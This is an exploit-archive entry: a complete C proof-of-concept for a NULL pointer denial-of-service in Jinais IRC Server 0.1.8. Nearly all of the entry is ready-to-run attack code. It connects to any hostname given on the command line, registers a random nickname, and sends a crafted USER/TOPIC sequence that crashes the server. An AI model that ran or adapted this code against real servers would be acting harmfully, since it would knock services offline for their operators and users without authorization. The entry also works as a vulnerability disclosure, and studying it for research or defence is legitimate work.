Jinais IRC Server 0.1.8 - NULL Pointer PoC

2010-03-23T00:00:00
ID 1337DAY-ID-11417
Type zdt
Reporter Salvatore Fresta
Modified 2010-03-23T00:00:00

Description

Exploit for multiple platform in category dos / poc

                                        
                                            ==========================================
Jinais IRC Server 0.1.8 - NULL Pointer PoC
==========================================


/*
 
    Jinais IRC Server 0.1.8 - NULL Pointer PoC
     
    This PoC will disconnect the affected target IRC server using
    a NULL Pointer vulnerability.
 
    Copyright 2010 Salvatore Fresta aka Drosophila
 
    This program is free software; you can redistribute it and/or
    modify it under the terms of  the  GNU General Public License
    as published by the  Free Software Foundation; either version
    2 of the License, or (at your option) any later version.
 
    This program  is  distributed  in the hope  that  it  will be
    useful, but WITHOUT ANY WARRANTY;  without  even the  implied
    warranty  of  MERCHANTABILITY  or  FITNESS  FOR  A PARTICULAR
    PURPOSE. See the GNU General Public License for more details.
 
    You should have  received a copy  of  the  GNU General Public
    License along  with  this program;  if not, write to the Free
    Software Foundation,Inc., 59 Temple Place, Suite 330, Boston,
    MA 02111-1307 USA
 
    http://www.gnu.org/licenses/gpl-2.0.txt
 
*/
 
#include <stdio.h>
#include <string.h>
#include <getopt.h>
#include <stdlib.h>
#include <time.h>
#ifdef WIN32
    #include <winsock.h>
    #define close closesocket
#else
    #include <sys/types.h>
    #include <sys/socket.h>
    #include <netinet/in.h>
    #include <unistd.h>
    #include <errno.h>
    #include <netdb.h>
#endif
 
#define BUFF_SIZE 256
#define DEFAULT_PORT 4002
 
 
int socket_connect(char *server, int port);
char *socket_receive(int sock, int tout);
int socket_send(int socket, char *buffer, size_t size);
int socket_close(int socket);
 
 
 
int main(int argc, char *argv[]) {
 
    int sd,
        rnd_num,
        len,
        port = DEFAULT_PORT;
    char pkg[BUFF_SIZE],
         *response = NULL,
         *host = NULL;
     
    if(argc < 2) {
        printf("\nJinais IRC Server 0.1.8 NULL Pointer PoC - (c) Salvatore Fresta"
               "\nhttp://www.salvatorefresta.net"
               "\n"
               "\nUsage: %s <target_hostname> <port> (default: %d)\n\n", argv[0], port);
        return -1;
    }
     
    srand(time(NULL));
     
    host = argv[1];
    if(argc > 2) port = atoi(argv[2]);
     
    printf("\nJinais IRC Server 0.1.8 NULL Pointer PoC - (c) Salvatore Fresta"
           "\nhttp://www.salvatorefresta.net"
           "\n\n[*] Connecting to %s:%hu...", host, port);
     
    sd = socket_connect(host, port);
    if(sd < 0) {
        printf("\n[-] Error on connect!\n\n");
        return -1;
    }
     
    printf("\n[+] Connection estabilished"
           "\n[*] Loggin to IRC server...");
     
login: 
     
    rnd_num = rand()%100+1;
     
    len = snprintf(pkg, sizeof(pkg), "NICK randomnickname%d\r\n", rnd_num);
    if(len < 0 || len > sizeof(pkg)) {
        perror("\n[-] Error: snprintf");
        socket_close(sd);
        return -1;
    }
     
    if(socket_send(sd, pkg, len) < 0) {
        perror("\n[-] Error: socket_send");
        socket_close(sd);
        return -1;
    }
     
    response = socket_receive(sd, 3);
    if(!response) {
        perror("\n[-] Error: socket_receive");
        socket_close(sd);
        return -1;
    }
     
    if(strstr(response, "Nickname is already in use")) {
        free(response);
        goto login;
    }
    free(response);
     
    printf("\n[+] Login successfully"
           "\n[*] Data sending...");
            
    rnd_num = rand()%100+1;
    len = snprintf(pkg, sizeof(pkg), "USER blabla\r\nTOPIC #ch%d\r\n", rnd_num);
    if(len < 0 || len > sizeof(pkg)) {
        perror("\n[-] Error: snprintf");
        socket_close(sd);
        return -1;
    }
     
    if(socket_send(sd, pkg, len) < 0) {
        perror("\n[-] Error: socket_send");
        socket_close(sd);
        return -1;
    }
     
    response = socket_receive(sd, 3);
    if(!response) {
        perror("\n[-] Error: socket_receive");
        socket_close(sd);
        return -1;
    }
     
    socket_close(sd);
     
    printf("\n[+] Data sent successfully"
           "\n[+] Connection closed\n\n");
     
    return 0;
     
}
 
 
 
int socket_connect(char *server, int port) {
 
    int sd;
    struct sockaddr_in sock;
    struct hostent *host = NULL;
     
#ifdef WIN32   
    WSADATA wsadata;
    if(WSAStartup(MAKEWORD(1,0), &wsadata)) return -1;
#endif
     
    memset(&sock, 0, sizeof(sock));
     
    if((sd = socket(AF_INET, SOCK_STREAM, 0)) < 0) return -1;
     
    sock.sin_family = AF_INET;
    sock.sin_port = htons(port);
     
    if(!(host=gethostbyname(server))) return -1;
     
    sock.sin_addr = *((struct in_addr *)host->h_addr);
     
    if(connect(sd, (struct sockaddr *) &sock, sizeof(sock)) < 0) return -1;
     
    return sd;
    
}
 
 
 
char *socket_receive(int sock, int tout) {
 
    int ret,
        byte_recv,
        oldpkglen = 0,
        pkglen = 0;
    char *buffer = NULL,
         tmp[128];
    struct timeval timeout;
    fd_set input;
     
    if(sock < 0) return NULL;
     
    while (1) {
         
        FD_ZERO(&input);
        FD_SET(sock, &input);
         
        if(tout > 0) {
            timeout.tv_sec  = tout;
            timeout.tv_usec = 0;
            ret = select(sock + 1, &input, NULL, NULL, &timeout);
        }
        else
            ret = select(sock + 1, &input, NULL, NULL, NULL);
     
        if (!ret) break;
        if (ret < 0) return NULL;
         
        byte_recv = recv(sock, tmp, sizeof(tmp), 0);
         
        if(byte_recv < 0) return NULL;
         
        if(!byte_recv) break;
         
        oldpkglen = pkglen;
        pkglen += byte_recv;
         
        buffer = (char *) realloc(buffer, pkglen+1);
         
        if(!buffer) return NULL;
         
        memcpy(buffer+oldpkglen, tmp, byte_recv);
     
    }
     
    if(buffer) buffer[pkglen] = 0;
     
    return buffer;
    
}
 
 
 
int socket_send(int socket, char *buffer, size_t size) {
     
    if(socket < 0) return -1;
 
    return send(socket, buffer, size, 0) < 0 ? -1 : 0;
     
}
 
 
 
int socket_close(int socket) {
     
    if(socket < 0) return -1;
     
    return close(socket) < 0 ? -1 : 0;
     
}



#  0day.today [2018-01-04]  #